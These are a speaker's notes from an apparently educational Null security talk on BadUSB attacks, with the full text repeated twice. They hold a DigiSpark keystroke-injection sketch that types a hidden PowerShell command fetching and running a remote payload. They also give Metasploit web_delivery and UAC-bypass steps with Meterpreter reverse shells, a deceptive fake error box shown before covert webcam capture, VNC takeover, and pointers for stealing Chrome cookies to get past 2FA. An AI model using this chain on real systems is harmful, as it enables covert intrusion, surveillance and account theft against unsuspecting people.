Notes of Null talk on BadUSB

## notes-null-talk.txt
## Bad USB code

#include "DigiKeyboard.h"

#define WorkingPin 1  // Just as an LED indicator, as to when the work is finished

void setup() {
}

void loop() {
  digitalWrite(WorkingPin, HIGH);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(WorkingPin, LOW);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

## Metasploit resource file used in demonstration msf-web-delivery.rc

use exploit/multi/script/web_delivery
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
set payload windows/x64/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate   # This step is necessary otherwise the session just dies
exploit -j

## For Popping up an innocuous message box, before starting capturing webcam snaps

DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527

railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox

If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this :

client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)

## For VNC
After getting a meterpreter session : run vnc
Then connect with a VNC client on the "local machine"

## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ )

use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set session 2
set LHOST <YOUR_LOCAL_IP_HERE>
exploit

## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled :

https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323

There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md


## State of the art things
Bad USB cables : https://mg.lol/blog/badusb-cables/
O.M.G. cables  : https://mg.lol/blog/omg-cable/

## Other Useful Things

DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts


#shamelessSelfPromotion Ahead :p

You can read my other blogs here : https://lud1161.github.io/
and
Here : https://lud1161.wordpress.com/
	## Bad USB code

	#include "DigiKeyboard.h"

	#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished

	void setup() {
	}

	void loop() {
	digitalWrite(WorkingPin, HIGH);
	DigiKeyboard.sendKeyStroke(0);
	DigiKeyboard.delay(500);
	DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
	DigiKeyboard.delay(500);
	DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
	DigiKeyboard.sendKeyStroke(KEY_ENTER);
	digitalWrite(WorkingPin, LOW);
	for (;;) {
	/Stops the digispark from running the scipt again/
	}
	}

	## Metasploit resource file used in demonstration msf-web-delivery.rc

	use exploit/multi/script/web_delivery
	set Target 2
	set LHOST <YOUR_LOCAL_IP_HERE>
	set LPORT 6680
	set payload windows/x64/meterpreter/reverse_tcp
	set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies
	exploit -j

	## For Popping up an innocuous message box, before starting capturing webcam snaps

	DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527

	railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox

	If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this :

	client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)

	## For VNC
	After getting a meterpreter session : run vnc
	Then connect with a VNC client on the "local machine"

	## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ )

	use exploit/windows/local/bypassuac_comhijack
	set payload windows/x64/meterpreter/reverse_tcp
	set session 2
	set LHOST <YOUR_LOCAL_IP_HERE>
	exploit

	## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled :

	https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
	You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323

	There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md


	## State of the art things
	Bad USB cables : https://mg.lol/blog/badusb-cables/
	O.M.G. cables : https://mg.lol/blog/omg-cable/

	## Other Useful Things

	DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts


	#shamelessSelfPromotion Ahead :p

	You can read my other blogs here : https://lud1161.github.io/
	and
	Here : https://lud1161.wordpress.com/